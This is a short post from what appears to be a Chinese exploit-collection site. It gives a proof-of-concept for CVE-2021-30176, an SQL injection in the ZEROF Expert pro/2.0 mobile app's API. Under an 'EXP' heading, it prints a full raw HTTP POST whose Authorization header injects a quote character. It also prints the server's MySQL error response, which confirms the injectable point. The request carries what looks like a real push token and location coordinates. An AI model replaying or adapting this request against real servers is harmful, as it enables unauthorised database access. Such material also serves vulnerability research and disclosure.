CVE-2021-30176_ZEROF_Expert_pro_2.0_application_for_mobile_devices_SQL注入漏洞

# CVE-2021-30176 ZEROF Expert pro/2.0 application for mobile devices SQL注入漏洞
==EXP==

POST /v2/devices/add HTTP/1.1
Host: zerof
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Date: Thu, 07 Apr 2021 13:40:57 +0300
Content-Length: 241
User-Agent: ZEROF Expert pro/2.0 (com.zerof.expertpro; build:2; iOS 14.4.0) Alamofire/4.8.2
Accept-Language: ru-RU;q=1.0
Authorization: ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak=
Accept-Encoding: gzip, deflate

device=?unrecognized?&geo=55.70402368871489%2C37.615802664058954&os=iOS%2014.4&token=f9Q0hE5JRpE%3AAPA91bFP19KGIIwJyLrbTuLwtP_jUvkUqqFM_k4W8czxm3ajT5Rh0jD2OHO_NmRIeY1C9zjzzNS_ch8VlNy2Bnqj5FcIdrWIFEevprpMGf3k96uFHuUsaa3aF8FS-RGwIsY8AXcUYcOP
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 176
Date: Wed, 07 Apr 2021 10:35:59 GMT
Server: ZEROF Web Server

 #42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'')' at line 1 
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容